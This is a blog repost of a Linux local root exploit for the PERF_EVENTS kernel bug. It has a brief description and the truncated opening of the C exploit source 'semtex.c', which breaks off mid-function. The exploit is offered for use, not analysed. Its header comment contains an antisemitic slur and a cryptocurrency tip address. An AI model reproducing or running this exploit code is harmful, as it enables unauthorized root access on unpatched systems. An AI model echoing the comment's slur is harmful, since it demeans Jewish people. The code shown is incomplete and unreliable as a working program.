Linux PERF_EVENTS Local Root Linux local root exploit that requires that PERF_EVENTS be compiled into the kernel. This has been fixed in 3.8.10. This bug apparently got backported from 2.6.37 into CentOS5 2.6.32 kernels. Code: /** linux 2.6.37-3.x.x x86_64, ~100 LOC* gcc-4.6 -O2 semtex.c && ./a.out* 2010 sd@fucksheep.org, salut!** update may 2013:* seems like centos 2.6.32 backported the perf bug, lol.* jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.*/ #define _GNU_SOURCE 1#include <stdint.h>#include <stdint.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <sys/mman.h>#include <syscall.h>#include <stdint.h>#include <assert.h> #define BASE 0x380000000#define SIZE 0x010000000#define KSIZE 0x2000000#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) void fuck() { int i,j,k; uint64_t uids[4] = { AB(2), AB(3), AB(...
The Hacks001 blog is the most popular, independent and trusted source for the latest news headlines on cybersecurity, hacking, computer security, cybercrime, privacy, vulnerabilities and technology for all businesses, information security professionals and hackers worldwide.